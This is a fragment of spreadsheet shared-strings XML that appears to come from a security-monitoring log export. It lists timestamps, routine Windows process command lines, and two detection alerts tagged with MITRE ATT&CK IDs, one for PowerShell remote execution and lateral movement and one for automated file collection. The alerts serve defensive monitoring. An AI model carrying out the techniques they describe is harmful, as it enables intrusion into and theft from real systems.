    <t>C:\\Windows\\System32\\Dism\\dismhost.exe {E94B3627-E724-413B-A4E4-FD4D6ADCEFB6}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.357</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.401</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.418</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.473</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.476</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.497</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.592</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.595</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.635</t>
  </si>
  <si>
    <t>Windows11\\Windows11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.650</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.687</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.705</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.720</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.748</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.749</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.751</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.776</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.778</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.803</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.841</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.845</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.857</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.899</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.900</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.902</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.937</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.977</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:06.990</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.494</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.539</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.540</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.542</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.543</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:08.618</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:09.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:12.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:13.237</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:1208</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:13.353</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:1244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:13.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:16.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:16.247</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:16.624</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:18.104</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:18.234</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:18.422</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:18.432</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:18.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:18.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:19.009</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:19.021</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:37:56.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:19.175</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:19.216</t>
  </si>
  <si>
    <t>Powershell script used "Invoke-command" cmdlet to execute code on remote computer</t>
  </si>
  <si>
    <t>[T1059.001 T1021.006]</t>
  </si>
  <si>
    <t>[Execution, Lateral Movement]</t>
  </si>
  <si>
    <t>[PowerShell, Windows Remote Management]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:21.102</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 20c -InterruptEvent 0 -NGENProcess 1e0 -Pipe 208 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:21.243</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:21.661</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 264 -InterruptEvent 0 -NGENProcess 288 -Pipe 2ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:22.008</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:22.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:22.915</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 2e0 -Pipe 2e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.241</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2e4 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 2d8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.720</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 2f0 -Pipe 2fc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.722</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 0 -NGENProcess 2ac -Pipe 2f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.737</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 29c -Pipe 2f8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.759</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2cc -InterruptEvent 0 -NGENProcess 29c -Pipe 2ec -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.776</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 31c -InterruptEvent 0 -NGENProcess 304 -Pipe 320 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.790</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 300 -InterruptEvent 0 -NGENProcess 334 -Pipe 2ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 340 -InterruptEvent 0 -NGENProcess 31c -Pipe 34c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.798</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2b8 -InterruptEvent 0 -NGENProcess 2c0 -Pipe 288 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.824</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 314 -Pipe 210 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.945</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 0 -NGENProcess 2d4 -Pipe 2f4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.971</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 2f4 -Pipe 2d0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.972</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 364 -InterruptEvent 0 -NGENProcess 2b4 -Pipe 360 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:23.985</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 36c -InterruptEvent 0 -NGENProcess 330 -Pipe 354 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.004</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 35c -Pipe 2d4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.186</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 35c -InterruptEvent 0 -NGENProcess 358 -Pipe 288 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.187</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.207</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.208</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.238</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.505</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 370 -InterruptEvent 0 -NGENProcess 37c -Pipe 344 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.534</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:24.645</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:25.287</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:25.711</t>
  </si>
  <si>
    <t>Powershell script recursively collected files from a filesystem search</t>
  </si>
  <si>
    <t>[T1083 T1119]</t>
  </si>
  <si>
    <t>[Discovery, Collection]</t>
  </si>
  <si>
    <t>[File and Directory Discovery, Automated Collection]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:26.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:26.499</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:26.526</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 358 -InterruptEvent 0 -NGENProcess 32c -Pipe 35c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:26.692</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 0 -NGENProcess 304 -Pipe 340 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:26.978</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:27.069</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 3d8 -Pipe 3a8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:27.199</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 0 -NGENProcess 3f0 -Pipe 3e4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:28.363</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:28.587</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 0 -NGENProcess 39c -Pipe 390 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:28.596</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 0 -NGENProcess 390 -Pipe 3e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:31.052</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3dc -InterruptEvent 0 -NGENProcess 3ac -Pipe 304 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:34.006</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:36.171</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:36.634</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 29c -InterruptEvent 0 -NGENProcess 3f8 -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:40.460</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e0 -InterruptEvent 0 -NGENProcess 330 -Pipe 378 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:42.326</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:43.997</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ec -InterruptEvent 0 -NGENProcess 3cc -Pipe 3dc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:44.031</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\Dism\\dismhost.exe {9B19AF82-22FF-4811-8AC0-4D94A516ECFA}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:45.901</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 390 -Pipe 3c0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:48.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:48.223</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 358 -InterruptEvent 0 -NGENProcess 398 -Pipe 384 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:48.230</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 0 -NGENProcess 38c -Pipe 220 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:54.065</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:54.370</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 0 -NGENProcess 3c8 -Pipe 1e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:38:54.393</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 3ec -Pipe 36c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:04.193</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:10.809</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:13.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:13.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:13.210</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:19.235</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:26.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:29.763</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:29.935</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\Dism\\dismhost.exe {51D64450-6BA3-4B69-9A16-4BDE1EDC6A40}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:31.509</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 0 -NGENProcess 374 -Pipe 3d8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:31.510</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 390 -InterruptEvent 0 -NGENProcess 2b8 -Pipe 3d4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:36.029</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:36.202</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 0 -NGENProcess 358 -Pipe 3ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:37.448</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 388 -InterruptEvent 0 -NGENProcess 39c -Pipe 348 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:38.017</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:40.701</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:42.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:42.911</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 38c -InterruptEvent 0 -NGENProcess 354 -Pipe 248 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:44.072</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 3b8 -Pipe 3e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:45.993</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:46.696</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 31c -InterruptEvent 0 -NGENProcess 3b8 -Pipe 3e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:48.583</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 348 -InterruptEvent 0 -NGENProcess 350 -Pipe 2cc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:50.304</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 350 -InterruptEvent 0 -NGENProcess 338 -Pipe 3bc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:52.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:52.107</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:57.581</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:39:59.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:02.436</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:04.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:05.160</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 398 -InterruptEvent 0 -NGENProcess 3a0 -Pipe 358 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:06.661</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 0 -NGENProcess 338 -Pipe 2c0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:10.133</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:10.505</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 0 -NGENProcess 3a4 -Pipe 288 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:10.514</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 0 -NGENProcess 3fc -Pipe 3b8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:12.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:12.110</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2c8 -InterruptEvent 0 -NGENProcess 3b0 -Pipe 2b8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:13.243</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 31c -InterruptEvent 0 -NGENProcess 354 -Pipe 3a0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:17.039</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:18.573</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:18.796</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:18.804</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 350 -InterruptEvent 0 -NGENProcess 398 -Pipe 354 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:20.047</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 334 -InterruptEvent 0 -NGENProcess 3a4 -Pipe 3b4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:27.361</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:27.663</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 334 -Pipe 30c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:27.695</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 334 -InterruptEvent 0 -NGENProcess 2b0 -Pipe 2b4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:29.766</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:29.904</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 38c -InterruptEvent 0 -NGENProcess 364 -Pipe 310 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:29.909</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 334 -InterruptEvent 0 -NGENProcess 2b0 -Pipe 348 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:31.839</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:31.888</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 39c -InterruptEvent 0 -NGENProcess 348 -Pipe 330 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:31.907</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3fc -InterruptEvent 0 -NGENProcess 3d4 -Pipe 330 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:36.159</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:37.394</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:37.680</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 374 -InterruptEvent 0 -NGENProcess 2d4 -Pipe 310 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:37.684</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 38c -Pipe 2cc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:43.668</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:47.260</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:47.584</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 378 -InterruptEvent 0 -NGENProcess 2fc -Pipe 320 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:47.592</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 0 -NGENProcess 304 -Pipe 3e4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:56.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:40:57.398</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 2d0 -Pipe 324 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:05.926</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 300 -InterruptEvent 0 -NGENProcess 39c -Pipe 2ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:11.653</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:11.848</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 304 -Pipe 210 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:11.854</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 314 -InterruptEvent 0 -NGENProcess 340 -Pipe 2a8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:41:11.858</t>
  </si>
  <si>
